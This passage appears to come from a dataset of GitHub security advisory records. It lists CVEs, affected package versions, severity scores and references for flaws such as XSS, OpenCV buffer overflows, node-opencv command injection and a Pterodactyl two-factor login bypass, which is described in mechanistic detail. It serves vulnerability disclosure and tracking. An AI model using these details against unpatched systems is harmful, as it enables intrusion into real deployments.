'https://github.com/blendin/pocs/blob/master/opencv/0.OOB_Write_FillUniColor'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:09:22Z', 'nvd_published_at': '2018-01-02T17:29:00Z'}"
+1.4.0,GHSA-c87f-fq5g-63r2,2021-10-08T21:32:32Z,2021-10-12T17:51:11Z,,['CVE-2021-42053'],Cross-site scripting in Unicorn framework,The Unicorn framework through 0.35.3 for Django allows XSS via component.name.,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'django-unicorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.36.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42053'}, {'type': 'WEB', 'url': 'https://github.com/adamghill/django-unicorn/pull/288/commits/aa5b9835d946bd9893ef02e556859e3ea62cc5e2'}, {'type': 'PACKAGE', 'url': 'https://github.com/adamghill/django-unicorn'}, {'type': 'WEB', 'url': 'https://github.com/adamghill/django-unicorn/compare/0.35.3...0.36.0'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164442/django-unicorn-0.35.3-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:32:32Z', 'nvd_published_at': '2021-10-07T06:15:00Z'}"
+1.4.0,GHSA-j66h-cc96-c32q,2021-10-18T14:54:10Z,2021-10-12T18:42:30Z,,['CVE-2021-36150'],Cross-site Scripting in SilverStripe Framework,SilverStripe Framework through 4.8.1 allows XSS.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36150'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-framework'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/releases'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/CVE-2021-36150'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:42:15Z', 'nvd_published_at': '2021-10-07T14:15:00Z'}"
+1.4.0,GHSA-2p6r-37p9-89p2,2021-10-21T14:32:55Z,2021-10-21T17:46:57Z,,['CVE-2021-41135'],Authz Module Non-Determinism,"### Impact
+
+Consensus failure for 0.43.x and 0.44.{0,1} users.
+Funds and balances are safe.
+
+### Patches
+
+0.44.2
+
+### Workarounds
+
+Manually patch the code.
+
+---
+
+Full details posted in https://forum.cosmos.network/t/cosmos-sdk-vulnerability-retrospective-security-advisory-jackfruit-october-12-2021/5349.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cosmos/cosmos-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.43.0'}, {'fixed': '0.44.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/security/advisories/GHSA-2p6r-37p9-89p2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41135'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/commit/68ab790a761e80d3674f821794cf18ccbfed45ee'}, {'type': 'WEB', 'url': 'https://forum.cosmos.network/t/cosmos-sdk-vulnerability-retrospective-security-advisory-jackfruit-october-12-2021/5349'}, {'type': 'PACKAGE', 'url': 'https://github.com/cosmos/cosmos-sdk'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/releases/tag/v0.44.2'}]","{'cwe_ids': ['CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T15:36:34Z', 'nvd_published_at': '2021-10-20T18:15:00Z'}"
+1.4.0,GHSA-5pcx-vqjp-p34w,2021-10-01T17:49:59Z,2021-10-04T20:11:03Z,,['CVE-2021-25963'],Cross-site Scripting in shuup,"In Shuup, versions 1.6.0 through 2.10.8 are vulnerable to reflected Cross-Site Scripting (XSS) that allows execution of arbitrary javascript code on a victim browser. This vulnerability exists due to the error page contents not escaped.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'shuup'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '2.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25963'}, {'type': 'WEB', 'url': 'https://github.com/shuup/shuup/commit/75714c37e32796eb7cbb0d977af5bcaa26573588'}, {'type': 'PACKAGE', 'url': 'https://github.com/shuup/shuup'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25963'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-01T17:49:59Z', 'nvd_published_at': '2021-09-30T08:15:00Z'}"
+1.4.0,GHSA-5rpc-gwh9-q9fg,2021-11-18T15:33:54Z,2021-10-12T22:02:21Z,,['CVE-2017-12862'],Improper Restriction of Operations within the Bounds of a Memory Buffer in OpenCV,"In modules/imgcodecs/src/grfmt_pxm.cpp, the length of buffer AutoBuffer _src is small than expected, which will cause copy buffer overflow later. If the image is from remote, may lead to remote code execution or denial of service. This affects OpenCV 3.3 (corresponding to OpenCV-Python 3.3.0.9) and earlier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12862'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9370'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:44:45Z', 'nvd_published_at': '2017-08-15T16:29:00Z'}"
+1.4.0,GHSA-mc7w-4cjf-c973,2021-10-07T19:30:03Z,2021-10-12T22:06:57Z,,['CVE-2019-10061'],OS Command Injection in node-opencv,utils/find-opencv.js in node-opencv (aka OpenCV bindings for Node.js) prior to 6.1.0 is vulnerable to Command Injection. It does not validate user input allowing attackers to execute arbitrary commands.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'opencv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10061'}, {'type': 'WEB', 'url': 'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b'}, {'type': 'WEB', 'url': 'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563'}, {'type': 'PACKAGE', 'url': 'https://github.com/peterbraden/node-opencv/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/789'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/opencv'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T19:30:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fr58-2xhv-qp3w,2021-10-08T14:44:47Z,2021-10-12T22:01:16Z,,['CVE-2017-12600'],Denial of Service in OpenCV,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has a denial of service (CPU consumption) issue, as demonstrated by the 11-opencv-dos-cpu-exhaust test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12600'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9311'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/11'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/9'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T14:44:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6gjf-7w99-j7x7,2022-10-13T18:02:46Z,2021-10-06T17:46:40Z,,['CVE-2021-41126'],Deleted Admin Can Sign In to Admin Interface,"### Impact
+Assuming an administrator once had previous access to the admin interface, they may still be able to sign in to the backend using October CMS v2.0.
+
+### Patches
+The issue has been patched in v2.1.12
+
+### Workarounds
+
+- Reset the password of the deleted accounts to prevent them from signing in.
+
+- Please contact hello@octobercms.com for code change instructions if you are unable to upgrade.
+
+### References
+
+Credits to:
+• Daniel Bidala
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/october'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'october/system'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-6gjf-7w99-j7x7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41126'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}, {'type': 'WEB', 'url': 'https://octobercms.com/changelog'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:27:51Z', 'nvd_published_at': '2021-10-06T18:15:00Z'}"
+1.4.0,GHSA-3374-7h99-xr85,2021-10-29T13:52:23Z,2021-10-25T19:43:05Z,,['CVE-2020-23049'],Cross-site scripting in forkcms,"Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the `Displayname` field when using the `Add`, `Edit` or `Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'forkcms/forkcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23049'}, {'type': 'WEB', 'url': 'https://github.com/forkcms/forkcms/commit/6ec6171206a7507a39695edc8bbd1b97ef1041c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/forkcms/forkcms'}, {'type': 'WEB', 'url': 'https://www.vulnerability-lab.com/get_content.php?id=2208'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T18:26:04Z', 'nvd_published_at': '2021-10-22T20:15:00Z'}"
+1.4.0,GHSA-5h9g-x5rv-25wg,2021-10-22T13:49:23Z,2021-10-22T16:24:02Z,,[],Cross-site scripting vulnerability in TinyMCE,"### Impact
+A cross-site scripting (XSS) vulnerability was discovered in the schema validation logic of the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor using the clipboard or editor APIs. This malicious content could then end up in content published outside the editor, if no server-side sanitization was performed. This impacts all users who are using TinyMCE 5.8.2 or lower.
+
+### Patches
+This vulnerability has been patched in TinyMCE 5.9.0 by ensuring schema validation was still performed after unwrapping invalid elements.
+
+### Workarounds
+To work around this vulnerability, either:
+- Upgrade to TinyMCE 5.9.0 or higher
+- Manually sanitize the content using the `BeforeSetContent` event (see below)
+
+#### Example: Manually sanitize content
+```js
+editor.on('BeforeSetContent', function(e) {
+ var sanitizedContent = ...; // Manually sanitize content here
+ e.content = sanitizedContent;
+});
+```
+
+### Acknowledgements
+Tiny Technologies would like to thank William Bowling for discovering this vulnerability.
+
+### References
+https://www.tiny.cloud/docs/release-notes/release-notes59/#securityfixes
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)
+* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'TinyMCE'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'tinymce/tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/security/advisories/GHSA-5h9g-x5rv-25wg'}, {'type': 'PACKAGE', 'url': 'https://github.com/tinymce/tinymce'}, {'type': 'WEB', 'url': 'https://www.tiny.cloud/docs/release-notes/release-notes59/#securityfixes'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-22T13:49:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r838-q6jp-58xx,2021-10-08T23:00:17Z,2021-10-12T16:31:22Z,,['CVE-2013-1895'],Improper Restriction of Excessive Authentication Attempts in py-bcrypt,"The py-bcrypt module before 0.3 for Python does not properly handle concurrent memory access, which allows attackers to bypass authentication via multiple authentication requests, which trigger the password hash to be overwritten.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'py-bcrypt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-1895'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/83039'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101382.html'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101387.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2013/03/26/2'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/58702'}]","{'cwe_ids': ['CWE-307'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:00:17Z', 'nvd_published_at': '2020-01-28T15:15:00Z'}"
+1.4.0,GHSA-m49f-hcxp-6hm6,2023-09-20T19:07:20Z,2021-10-25T19:42:46Z,,['CVE-2021-41176'],pterodactyl/panel CSRF allowing an external page to trigger a user logout event,"### Impact
+A malicious user can trigger a user logout if a signed in user visits a malicious website that makes a request to the Panel's sign-out endpoint. This requires a targeted attack against a specific Panel instance, and serves only to sign a user out. **No user details are leaked, nor is any user data affected, this is simply an annoyance at worst.**
+
+### Patches
+None.
+
+### Workarounds
+None.
+
+### For more information
+If you have any questions or comments about this advisory please contact `Tactical Fish#8008` on Discord, or email `dane@pterodactyl.io`.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pterodactyl/panel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/security/advisories/GHSA-m49f-hcxp-6hm6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41176'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/commit/45999ba4ee1b2dcb12b4a2fa2cedfb6b5d66fac2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/panel'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/releases/tag/v1.6.3'}]","{'cwe_ids': ['CWE-352'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T16:51:25Z', 'nvd_published_at': '2021-10-25T17:15:00Z'}"
+1.4.0,GHSA-grh7-935j-hg6w,2023-01-24T15:03:47Z,2021-10-06T17:47:17Z,,['CVE-2021-30151'],Cross-site Scripting in Sidekiq,Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'sidekiq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'sidekiq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30151'}, {'type': 'WEB', 'url': 'https://github.com/mperham/sidekiq/issues/4852'}, {'type': 'WEB', 'url': 'https://github.com/mperham/sidekiq/commit/64f70339d1dcf50a55c00d36bfdb61d97ec63ed8'}, {'type': 'PACKAGE', 'url': 'https://github.com/mperham/sidekiq'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T16:52:11Z', 'nvd_published_at': '2021-04-06T06:15:00Z'}"
+1.4.0,GHSA-jfmf-w293-8xr8,2021-10-13T17:43:34Z,2021-10-13T18:55:52Z,,[],Regular expression Denial of Service (ReDoS) in EmailValidator class in V7 compatibility module in Vaadin 8,Unsafe validation RegEx in `EmailValidator` component in `com.vaadin:vaadin-compatibility-server` versions 8.0.0 through 8.12.4 (Vaadin versions 8.0.0 through 8.12.4) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.13.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.12.4'}}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-jfmf-w293-8xr8'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/framework'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31409'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:43:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3w73-fmf3-hg5c,2022-02-23T22:19:32Z,2021-10-19T20:15:50Z,,['CVE-2021-42575'],Policies not properly enforced in OWASP Java HTML Sanitizer,"The OWASP Java HTML Sanitizer before 20211018.1 does not properly enforce policies associated with the `SELECT`, `STYLE`, and `OPTION` elements.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20211018.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42575'}, {'type': 'WEB', 'url': 'https://docs.google.com/document/d/11SoX296sMS0XoQiQbpxc5pNxSdbJKDJkm5BDv0zrX50/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T16:10:40Z', 'nvd_published_at': '2021-10-18T15:15:00Z'}"
+1.4.0,GHSA-5vfx-8w6m-h3v4,2022-08-15T20:12:39Z,2021-10-04T20:14:13Z,,['CVE-2021-41129'],Pterodactyl Panel vulnerable to authentication bypass due to improper user-provided security token verification,"A malicious user can modify the contents of a `confirmation_token` input during the two-factor authentication process to reference a cache value not associated with the login attempt. In rare cases this can allow a malicious actor to authenticate as a random user in the Panel. The malicious user must target an account with two-factor authentication enabled, and then must provide a correct two-factor authentication token before being authenticated as that user.
+
+## Impact
+Due to a validation flaw in the logic handling user authentication during the two-factor authentication process a malicious user can trick the system into loading credentials for an arbitrary user by modifying the token sent to the server. This authentication flaw is present in the `LoginCheckpointController@__invoke` method which handles two-factor authentication for a user.
+
+This controller looks for a request input parameter called `confirmation_token` which is expected to be a 64 character random alpha-numeric string that references a value within the Panel's cache containing a `user_id` value. This value is then used to fetch the user that attempted to login, and lookup their two-factor authentication token. Due to the design of this system, any element in the cache that contains only digits could be referenced by a malicious user, and whatever value is stored at that position would be used as the `user_id`.
+
+There are a few different areas of the Panel that store values into the cache that are integers, and a user who determines what those cache keys are could pass one of those keys which would cause this code pathway to reference an arbitrary user.
+
+## Scope
+At its heart this is a high-risk login bypass vulnerability. However, there are a few additional conditions that must be met in order for this to be successfully executed, notably:
+
+1.) The account referenced by the malicious cache key **must** have two-factor authentication enabled. An account without two-factor authentication would cause an exception to be triggered by the authentication logic, thusly exiting this authentication flow.
+2.) Even if the malicious user is able to reference a valid cache key that references a valid user account with two-factor authentication, they **must** provide a valid two-factor authentication token.
+
+However, due to the design of this endpoint once a valid user account is found with two-factor authentication enabled there is no rate-limiting present, thusly allowing an attacker to brute force combinations until successful. This leads to a third condition that must be met:
+
+3.) For the duration of this attack sequence the cache key being referenced must continue to exist with a valid `user_id` value. Depending on the specific key being used for this attack, this value may disappear quickly, or be changed by other random user interactions on the Panel, outside the control of the attacker.
+
+### About the Severity
+As you may have noticed, this is not a trivial authentication bypass bug to exploit, and is likely incredibly difficult for a layperson to pull off. However, the severity of this disclosure has been prepared based on the nature of the bug and the potential for unexpected administrative account access under very rare conditions.
+
+## Mitigation
+In order to mitigate this vulnerability the underlying authentication logic was changed to use an encrypted session store that the user is therefore unable to control the value of. This completely removed the use of a user-controlled value being used. In addition, the code was audited to ensure this type of vulnerability is not present elsewhere.
+
+If you have any questions or concerns about the content of this disclosure please contact `Tactical Fish#8008` on Discord, or email `dane ät pterodactyl.io`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pterodactyl/panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/security/advisories/GHSA-5vfx-8w6m-h3v4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41129'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/commit/4a84c36009be10dbd83051ac1771662c056e4977'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/panel'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/blob/v1.6.2/CHANGELOG.md#v162'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/releases/tag/v1.6.2'}]","{'cwe_ids': ['CWE-287', 'CWE-502', 'CWE-639', 'CWE-807'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-04T16:51:31Z', 'nvd_published_at': '2021-10-06T20:15:00Z'}"
+1.4.0,GHSA-5f38-9jw2-6r6h,2022-05-04T03:42:48Z,2021-10-12T16:22:04Z,,['CVE-2021-23447'],Cross-site Scripting in teddy,Teddy is a readable and easy to learn templating language. This affects the package teddy before 0.5.9. A type confusion vulnerability can be used to bypass input sanitization when the model content is an array (instead of a string).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'teddy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23447'}, {'type': 'WEB', 'url': 'https://github.com/rooseveltframework/teddy/pull/518'}, {'type': 'WEB', 'url': 'https://github.com/rooseveltframework/teddy/commit/64c556717b4879bf8d4c30067cf6e70d899a3dc0'}, {'type': 'PACKAGE', 'url': 'https://github.com/rooseveltframework/teddy'}, {'type': 'WEB', 'url': 'https://github.com/rooseveltframework/teddy/releases/tag/0.5.9'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TEDDY-1579557'}]","{'cwe_ids': ['CWE-79', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:52:26Z', 'nvd_published_at': '2021-10-07T17:15:00Z'}"
+1.4.0,GHSA-3448-vrgh-85xr,2021-11-18T15:27:30Z,2021-10-12T22:21:43Z,,['CVE-2019-14493'],NULL Pointer Dereference in OpenCV.,An issue was discovered in OpenCV before 4.1.1 (OpenCV-Python before 4.1.1.26). There is a NULL pointer dereference in the function cv::XMLParser::parse at modules/core/src/persistence.cpp.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': 